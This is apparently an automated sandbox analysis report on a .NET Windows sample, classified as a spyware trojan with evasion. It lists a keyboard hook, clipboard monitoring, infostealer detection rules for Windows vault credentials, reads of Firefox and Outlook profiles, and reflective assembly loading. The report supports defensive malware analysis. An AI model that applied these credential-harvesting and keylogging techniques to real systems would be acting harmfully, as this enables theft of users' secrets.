                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49757 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 0V85.cs.Net Code: j6bRr
                      Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, 0V85.cs.Net Code: j6bRr
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LisectAVT_2403002A_127.exeJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 0_2_0172D3640_2_0172D364
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 0_2_02F131800_2_02F13180
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 0_2_054ABF680_2_054ABF68
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 0_2_054AEAEE0_2_054AEAEE
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_0176A7683_2_0176A768
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_01764A703_2_01764A70
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_0176EC683_2_0176EC68
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_0176AF303_2_0176AF30
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_01763E583_2_01763E58
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_017641A03_2_017641A0
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_017619783_2_01761978
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CB0E0C3_2_06CB0E0C
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CB22DB3_2_06CB22DB
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CB22E83_2_06CB22E8
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CB2FDE3_2_06CB2FDE
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC66F03_2_06CC66F0
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC7E883_2_06CC7E88
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CCC6903_2_06CCC690
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC56A03_2_06CC56A0
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC27583_2_06CC2758
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CCB3383_2_06CCB338
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC77A83_2_06CC77A8
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC5DF83_2_06CC5DF8
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CCE8A83_2_06CCE8A8
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC00403_2_06CC0040
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CC00073_2_06CC0007
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2193630117.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea02ac7d2-6de8-49b2-97cf-664fd36726ae.exe4 vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194259387.0000000002F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194259387.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea02ac7d2-6de8-49b2-97cf-664fd36726ae.exe4 vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2197165841.0000000007C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4573204072.00000000012D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4572800662.00000000010F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea02ac7d2-6de8-49b2-97cf-664fd36726ae.exe4 vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exeBinary or memory string: OriginalFilenamegpjZ.exe4 vs LisectAVT_2403002A_127.exe
                      Source: LisectAVT_2403002A_127.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.LisectAVT_2403002A_127.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: LisectAVT_2403002A_127.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 4Cl.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 4Cl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 5jodGRGeKF.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 5jodGRGeKF.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack, 33JmeoXaqT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, klmAZ8HTeMLVuJRsAH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, klmAZ8HTeMLVuJRsAH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/2
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LisectAVT_2403002A_127.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMutant created: \Sessions\1\BaseNamedObjects\EfPTHAvKN
                      Source: LisectAVT_2403002A_127.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LisectAVT_2403002A_127.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: LisectAVT_2403002A_127.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: LisectAVT_2403002A_127.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: LisectAVT_2403002A_127.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: gpjZ.pdb source: LisectAVT_2403002A_127.exe
                      Source: Binary string: gpjZ.pdbSHA256 source: LisectAVT_2403002A_127.exe

                      Data Obfuscation

                      barindex
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.cs.Net Code: dJk7eGtM8T System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.cs.Net Code: dJk7eGtM8T System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                      Source: LisectAVT_2403002A_127.exeStatic PE information: 0xC63BD28A [Thu May 23 03:54:50 2075 UTC]
